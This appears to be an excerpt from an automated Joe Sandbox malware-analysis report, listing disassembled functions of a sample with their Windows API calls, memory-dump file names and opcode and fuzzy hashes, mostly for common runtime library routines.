                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$_free$InfoLocale_abort
                                              • String ID: v%(/
                                              • API String ID: 1663032902-2435473048
                                              • Opcode ID: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                              • Instruction ID: 2d4dd0c1c30cd12b50dfb53a4a1f7f5f9091958bb121381f53cce851c87d7921
                                              • Opcode Fuzzy Hash: b4047fd74fafd511f87100a415ff7352fa71784cc782813174b617cf7262d9f7
                                              • Instruction Fuzzy Hash: F921D632600606ABDB249F25DD41FBB73A8EB06316F10407FED01D6152EBBC9D48CB59
                                              Function 004520B6 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                              • EnumSystemLocalesW.KERNEL32(00452393,00000001,?,?,JD,?,00452734,JD,?,?,?,?,?,00444AED,?,?), ref: 00452102
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                              • String ID: JD
                                              • API String ID: 1084509184-2669065882
                                              • Opcode ID: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                              • Instruction ID: 883a99871793c155097d9da94a803295819168bd30f8f35cc04eca091e96b9f4
                                              • Opcode Fuzzy Hash: 43afbb6a7401c46fb6bd1099fc40b6d5da7848bdbd3577d5ff827f5c50c4ae4e
                                              • Instruction Fuzzy Hash: E8F0FF363007056FDB245F399881A6B7B96FB82769B04482EFE458B682DAB99C42D604
                                              Function 00448484 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00445909: EnterCriticalSection.KERNEL32(-0006D41D,?,0044305C,00000000,0046E938,0000000C,00443017,?,?,?,00445BA7,?,?,0044834A,00000001,00000364), ref: 00445918
                                              • EnumSystemLocalesW.KERNEL32(0044843E,00000001,0046EAE0,0000000C), ref: 004484BC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CriticalEnterEnumLocalesSectionSystem
                                              • String ID: v%(/
                                              • API String ID: 1272433827-2435473048
                                              • Opcode ID: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                              • Instruction ID: 901ea181f65c0ebd25502bb0be635eecd519ab6688482fb1bf3a60b9f01fb263
                                              • Opcode Fuzzy Hash: 08771b5932cf67d2f7a499a1ea32343f451e1cff339441a182db03018af17ba2
                                              • Instruction Fuzzy Hash: 37F04F76A50200EFEB00EF69D946B4D37E0FB04725F10446EF514DB2A2DB7899809B49
                                              Function 00446270 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                              • Instruction ID: f88ef0336175cd1615890b4a552d96ffb4623b3c947145a2eaf1ae153763923c
                                              • Opcode Fuzzy Hash: 321144b451aceacc10be44255a5eb5313de52b8189587c3c0fdae4375c3dd106
                                              • Instruction Fuzzy Hash: AA025D71E002199BEF14CFA9D8806AEFBF1FF49314F26816AD819E7384D734AD418B85
                                              Function 004120B2 Relevance: 2.6, APIs: 2, Instructions: 55memoryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411F72,?,?,?,?,?), ref: 00412122
                                              • HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00412129
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Heap$FreeProcess
                                              • String ID:
                                              • API String ID: 3859560861-0
                                              • Opcode ID: dd2f45b1bfdeb7a1a5420288e71913fa42d02de7f124d91d2f4ae112c61c3ef1
                                              • Instruction ID: dd486cb6b879bf1be37f4e59d5b3b18419fca2aff5c7e471244091183f2ba527
                                              • Opcode Fuzzy Hash: dd2f45b1bfdeb7a1a5420288e71913fa42d02de7f124d91d2f4ae112c61c3ef1
                                              • Instruction Fuzzy Hash: 0D113632000B11AFC7309F54DE85957BBEAFF08715305892EF29682922CB75FCA0CB48
                                              Function 004533AB Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004533A6,?,?,00000008,?,?,0045625D,00000000), ref: 004535D8
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExceptionRaise
                                              • String ID:
                                              • API String ID: 3997070919-0
                                              • Opcode ID: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                              • Instruction ID: 7263c04077df6a1dd25da4ac29b5b982fa38ace811980f45f75c7c5cedc24273
                                              • Opcode Fuzzy Hash: 7607852d8e830f82297ee51b6d0742b1a7d4b3e0fd86a5f67b8f7d07b9d25eec
                                              • Instruction Fuzzy Hash: 0FB13B315106089FD715CF28C48AB657BE0FF053A6F25865DE899CF3A2C339EA96CB44
                                              Function 004339D7 Relevance: 1.8, Strings: 1, Instructions: 501COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: 0
                                              • API String ID: 0-4108050209
                                              • Opcode ID: ac460f81c2ed1c183269c9f6522614bdccbebbe18bfaf8fef360a7d89dd83e89
                                              • Instruction ID: b5ae8e6f7fa87a7dee9e60626e0a37a25df5f2dd99b83f8da903d7583ecded6c
                                              • Opcode Fuzzy Hash: ac460f81c2ed1c183269c9f6522614bdccbebbe18bfaf8fef360a7d89dd83e89
                                              • Instruction Fuzzy Hash: 0C129E727083048BD304DF65D882A1EB7E2BFCC758F15892EF495AB381DA74E915CB86
                                              Function 00434CB6 Relevance: 1.6, APIs: 1, Instructions: 134COMMON
                                              Download Yara Rule
                                              APIs
                                              • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434CCF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: FeaturePresentProcessor
                                              • String ID:
                                              • API String ID: 2325560087-0
                                              • Opcode ID: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                              • Instruction ID: 5e37b39ef68b784d6588b9ddffa6793edf4c3ade0924e8be62ba08be237937aa
                                              • Opcode Fuzzy Hash: 4259bdeace04940204f61aa74a979230364aaba3051b8f8e0efcae6fb7ed6494
                                              • Instruction Fuzzy Hash: E4515B71D002488FEB24CF69D98579EBBF4FB88314F24956BD419EB264D378A940CF98
                                              Function 004525C3 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                              • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00452361,00000000,00000000,?), ref: 004525EF
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$InfoLocale_abort_free
                                              • String ID:
                                              • API String ID: 2692324296-0
                                              • Opcode ID: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                              • Instruction ID: 8c29d710edde3bbc403447a64c1727e90569dbd09ff88c71ffccea9529c81983
                                              • Opcode Fuzzy Hash: 1fdc73b6016995a7e39b97608f5a3b1d34212a550219c51fc6701dbba91f5541
                                              • Instruction Fuzzy Hash: C4F04936A00116BBDB245A24D905BBF7B58EB01315F04446BEC05A3241FAF8FD058694
                                              Function 00451FD0 Relevance: 1.5, APIs: 1, Instructions: 31COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                              • EnumSystemLocalesW.KERNEL32(00451F27,00000001,?,?,?,00452792,JD,?,?,?,?,?,00444AED,?,?,?), ref: 00452007
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                              • String ID:
                                              • API String ID: 1084509184-0
                                              • Opcode ID: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                              • Instruction ID: 16a122e2f6617649f53ffd93528404cf76eb0d70ff9257d35f530b0535ef024d
                                              • Opcode Fuzzy Hash: 06cdaad2b1dd0330ee545a4703de2c72ad4f4425d90ac6c7aa7d45dfeb8c5d5b
                                              • Instruction Fuzzy Hash: 84F0203630020597CB04AF75D845B6A7F90EB82729B06009AFE058B6A2C7799842C754
                                              Function 00434BD8 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                              Download Yara Rule
                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(Function_00034BE4,0043490B), ref: 00434BDD
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled
                                              • String ID:
                                              • API String ID: 3192549508-0
                                              • Opcode ID: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                              • Instruction ID: 702e07acd891e046c8aea5fc6397425f5e3bd38ef0af78e1c7fed93ac6412050
                                              • Opcode Fuzzy Hash: 2ffe05228c785604148d814c7fc250910b5f8136668f43492b8067ac5164d55b
                                              • Instruction Fuzzy Hash:
                                              Function 0043E34B Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: v%(/
                                              • API String ID: 0-2435473048
                                              • Opcode ID: 30caec0efc745099040319085d406cd9bdcff08e218f1b0552064e12ef4373be
                                              • Instruction ID: 32d6082e35155a0a096806a6943d6f48c3d67459c64856e3d931f7c23e0710f9
                                              • Opcode Fuzzy Hash: 30caec0efc745099040319085d406cd9bdcff08e218f1b0552064e12ef4373be
                                              • Instruction Fuzzy Hash: 59618971202709A6EE34892B88967BF63949F6D314F10342FE983DB3C1D65DDD82931E
                                              Function 0043E5A8 Relevance: 1.5, Strings: 1, Instructions: 237COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: v%(/
                                              • API String ID: 0-2435473048
                                              • Opcode ID: 341ce5e44018b0d8febb5363e57dd776d1ec6df4a054cddc6676df713c6a7dda
                                              • Instruction ID: 5d22fc1bcc5d638cf6a4a0606be4d5c4d5bba199c703cf788a7f99cafe8d65e8
                                              • Opcode Fuzzy Hash: 341ce5e44018b0d8febb5363e57dd776d1ec6df4a054cddc6676df713c6a7dda
                                              • Instruction Fuzzy Hash: 12615871602718A6DA38592B88977BF2384EB2D344F94351BE483DB3C1D75EAD43871E
                                              Function 00427AD7 Relevance: 1.4, Strings: 1, Instructions: 109COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: @
                                              • API String ID: 0-2766056989
                                              • Opcode ID: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                              • Instruction ID: bbd91956ea41f9089fdf4ea26de33e0e8d132f349ea16d9e77f48d305cf446da
                                              • Opcode Fuzzy Hash: d5e9d99cca5bd5e192b92381c11644beefd2514f072827777375d50a0dc20ebe
                                              • Instruction Fuzzy Hash: F1412975A183558FC340CF29D58020AFBE1FFC8318F645A1EF889A3350D379E9428B86
                                              Function 0044DA49 Relevance: .6, Instructions: 637COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c092c4f6b84b18e3b6cbbf7fe4413e1147b07dd6558fe569cc2693f6d3c9d2d8
                                              • Instruction ID: 4200599dcb49c21c1ca78238ad82984ca11e49a574bdd01b256a4bdf4e559873
                                              • Opcode Fuzzy Hash: c092c4f6b84b18e3b6cbbf7fe4413e1147b07dd6558fe569cc2693f6d3c9d2d8
                                              • Instruction Fuzzy Hash: D2322521D69F414DE7239A35CC22336A24CBFB73C5F15D737E81AB5AAAEB29C4834105
                                              Function 0041F18B Relevance: .6, Instructions: 598COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 11fe0a22ef666ee2c1bed35089f8503541a39c5702d52e9a7652229b453a748b
                                              • Instruction ID: 06c66d0f35fb266b7f69fbfce4f1f639eb17408d85dd7e5468211ecdc8378744
                                              • Opcode Fuzzy Hash: 11fe0a22ef666ee2c1bed35089f8503541a39c5702d52e9a7652229b453a748b
                                              • Instruction Fuzzy Hash: 7932C2716087459BC715DF28C4807ABB7E5BF84318F040A3EF89587392D779D98ACB8A
                                              Function 0042742E Relevance: .4, Instructions: 435COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 069969c8f4566116342464d842351c7afe0a72e1e3c3dbe851ab1ff53bf1dd64
                                              • Instruction ID: b033fe34555866f616fd3cc64b543b740d9cc82fbf2d17309ab2a27531c6336b
                                              • Opcode Fuzzy Hash: 069969c8f4566116342464d842351c7afe0a72e1e3c3dbe851ab1ff53bf1dd64
                                              • Instruction Fuzzy Hash: 6C02CEB17046528BC358CF2EEC5053AB7E1AB8D311744863EE495C7781EB35FA22CB94
                                              Function 00426E9F Relevance: .4, Instructions: 383COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
